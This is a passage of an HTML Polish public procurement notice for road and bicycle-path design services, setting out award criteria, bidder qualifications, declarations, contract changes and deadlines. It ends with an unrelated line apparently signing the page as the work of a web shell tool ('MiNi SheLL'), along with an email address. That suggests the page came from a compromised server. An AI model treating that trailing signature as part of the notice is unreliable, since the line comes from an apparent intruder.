Rowerowej”.<br/><br/><br/>Wszystkie wymagania określone w dokumentach postępowania (SWZ wraz z załącznikami) stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z udziału postępowaniu oraz spełniają warunki udziału w postępowaniu określone przez Zamawiającego wskazanie poniżej.<br/>W zakresie posiadania zdolności technicznej lub zawodowej.<br/>Wykonawca spełni ww. warunek udziału w postępowaniu jeśli wykaże, że:<br/>1/ dysponuje co najmniej jedną osobą, posiadającą uprawnienia do projektowania w branży drogowej, która posiada uprawnienia do projektowania w specjalności drogowej (lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów), oraz pełniła funkcję projektanta branży drogowej dla co najmniej 2 dokumentacji projektowych budowy, przebudowy, rozbudowy drogi, ścieżki rowerowej, zakończonych uzyskaniem decyzji o pozwoleniu na budowę/ZRID. <br/>Uwaga- Na podstawie art. 104 ustawy z dnia 7 lipca 1994 roku Prawo budowlane (t.j. Dz.U.<br/>z 2023 r. poz. 682 ze zm.) osoby, które przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z ich treścią decyzji o ich nadaniu w oparciu o przepisy będące podstawą ich nadania. Ponadto, zgodnie z art. 12 a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. W związku z powyższym, Zamawiający zaakceptuje uprawnienia budowlane odpowiadające uprawnieniom wymaganym przez Zamawiającego, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 22.12.2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz.U. z 2023 r. poz. 334).<br/>2/ w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej 2 usługi polegające na opracowaniu dokumentacji projektowej budowy/przebudowy drogi, ścieżki rowerowej o długości minimum 1000 m (każda), wraz z uzyskaniem decyzji pozwolenia na budowę/ZRID. <br/> Prace wykraczające poza wymagany charakter nie będą brane pod uwagę przy ocenie ofert.<br/>W odniesieniu do warunków udziału w postępowaniu, dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy - załącznik nr 12 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">b)	W celu potwierdzenia aktualności informacji zawartych w oświadczeniu wstępnym dotyczących braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu, Zamawiający żąda następujących oświadczeń: <br/>• oświadczenia o braku skazania za przestępstwa wskazane w art. 108 ust. 1 pkt. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych – Prawo zamówień publicznych (Dz.U.2024.1320 t.j.) - załącznik nr 8;<br/>•	oświadczenia składane w związku z art. 108 ust. 1 pkt. 3 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz.U.2024.1320 t.j.) o braku wyroku sądu lub decyzji o zaleganiu z uiszczeniem podatków, opłat lub składek ZUS - załącznik nr 6;<br/>•	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 Pzp;<br/>•	oświadczenia o braku podstaw do wykluczenia na podst. art. 108 ust 1 pkt 4 tj. oświadczenia Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne - załącznik nr 7;<br/>•	oświadczenia o braku podstaw do wykluczenia na podst. art. 108 ust 1 pkt. 5 i pkt. 6 brak podstaw do wykluczenia ze względu na zakłócenie konkurencji załącznik nr 3.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	W celu potwierdzenia spełniania warunku dotyczącego zdolności technicznej lub zawodowej Zamawiający żąda od Wykonawcy: <br/>1)	Złożenia wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, wskazującego na dysponowanie co najmniej jedną osobą, posiadającą uprawnienia do projektowania w branży drogowej, która posiada uprawnienia do projektowania w specjalności drogowej (lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów), oraz pełniła funkcję projektanta branży drogowej dla co najmniej 2 dokumentacji projektowych budowy, przebudowy, rozbudowy drogi, ścieżki rowerowej, zakończonych uzyskaniem decyzji o pozwoleniu na budowę/ZRID. wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. – załącznik nr 9.<br/>2)	Złożenia wykazu usług zgodnych z przedmiotem zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, w tym minimum 2 usług polegających na opracowaniu dokumentacji projektowej budowy/przebudowy drogi, ścieżki rowerowej o długości minimum 1000 m (każda), wraz z uzyskaniem decyzji pozwolenia na budowę/ZRID. Każda z ww. usług musi swym zakresem obejmować roboty budowlane, wraz z podaniem ich rodzaju wartości, daty i miejsca wykonania oraz podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty– załącznik nr 10.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda przedmiotowych środków dowodywch <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie <br/>o którym mowa w SWZ pkt 11 ust. 1 składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie – Załącznik nr 1 do SWZ te musi potwierdzać spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.<br/><br/> Jeżeli w imieniu wykonawcy/wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w SWZ Wykonawca składa pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy/ wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego<br/><br/> W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, wykonawca składa odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia ww. dokumentów, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, o której mowa w art. 454 ustawy Pzp.<br/>2.	W trakcie trwania umowy dopuszcza się wprowadzenie zmian wskazanych w art. 455 ustawy Pzp oraz następujących zmian do jej treści:<br/>a)	danych dotyczących stron umowy, jak zmiana nazwy, siedziby, adresu, numeru konta bankowego, osób upoważnionych jako przedstawiciele stron, itp.<br/>b)	zmiana formy zabezpieczenia należytego wykonania umowy.<br/>3.	Wszystkie wprowadzone zmiany mogą być dokonane tylko w odpowiednim zakresie, który wynika z okoliczności powodującej konieczność wprowadzenia zmian do umowy. <br/>4.	Zmiany umowy wymagają zgody obu Stron wyrażonej w formie pisemnej pod rygorem nieważności.<br/>5.	Wprowadzenie jakichkolwiek zmian do umowy możliwe jest tylko w granicach określonych art. 455 obowiązującej ustawy Prawo zamówień publicznych.<br/>6.	Zamawiający, działając na podstawie art. 455 ust.1 pkt 1 oraz 439 Ustawy, przewiduje również możliwość dokonania zmian umowy, który szczegółowo został opisany w SWZ w pkt 22 oraz w załączniku – wzór umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-02 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://lubiszyn.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-02 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-31</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Przed podpisaniem umowy Wykonawca zobowiązany będzie dostarczyć Zamawiającemu kopie dokumentów potwierdzających posiadanie uprawnień do projektowania <br/>w specjalności drogowej (lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów).<br/>2.	Po podpisaniu umowy a przed rozpoczęciem realizacji usługi Wykonawca zobowiązuje się dostarczyć kopię polisy lub innego dokumentu potwierdzającego fakt zawarcia ubezpieczenia z tytułu odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem umowy w zakresie prowadzonej działalności związanej <br/>z przedmiotem umowy przez okres co najmniej od daty rozpoczęcia realizacji usługi do daty odbioru końcowego.<br/>3.	W przypadku wyboru oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia, tj. konsorcjum, spółki cywilnej, Zamawiający wymaga przekazania przed przystąpieniem do podpisania umowy kopii umowy regulującej współpracę wykonawców. Kopia umowy musi być potwierdzona za zgodność z oryginałem przez osobę uprawnioną do reprezentowania Wykonawców. W przypadku wygaśnięcia polisy w trakcie realizacji przedmiotu umowy Wykonawca zobowiązany jest dostarczyć Zamawiającemu (do Referatu Infrastruktury Technicznej Ochrony Środowiska i Rolnictwa) potwierdzoną za zgodność z oryginałem, kopię kolejnej polisy, tak aby Zamawiający zawsze był w posiadaniu kopii ważnej polisy.<br/> W przypadku konsorcjum/spółki cywilnej polisa musi zostać wystawiona na rzecz Konsorcjum/Spółki Cywilnej z wyszczególnieniem w polisie jego Członków/ Wspólników. <br/>Wykonawca zobowiązany jest przedłożyć Zamawiającemu dowód zawarcia umowy ubezpieczenia oraz dowód opłacenia polisy lub aktualnej składki w przypadku opłacania polisy w formach ratalnych.<br/>W przypadku Konsorcjum/Spółka Cywilna Zamawiający wymaga kopii polis ubezpieczeniowych wystawionych na członka konsorcjum /Spółki Cywilnej który będzie faktycznym wykonawcą usługi<br/>4.	Od Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, wymagane będzie wniesienie, przed zawarciem umowy, zabezpieczenia należytego wykonania umowy w wysokości 5 % ceny całkowitej (brutto) podanej w ofercie za wykonanie całości przedmiotu zamówienia. Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy. <br/>5.	Zabezpieczenie należytego wykonania umowy może być wnoszone według wyboru wykonawcy w jednej lub w kilku formach wskazanych w art. 450 ust. 1 ustawy Pzp tj.:<br/>•	pieniądzu; <br/>•	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym; <br/>•	gwarancjach bankowych; <br/>•	gwarancjach ubezpieczeniowych; <br/>•	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

Creat By MiNi SheLL
Email: jattceo@gmail.com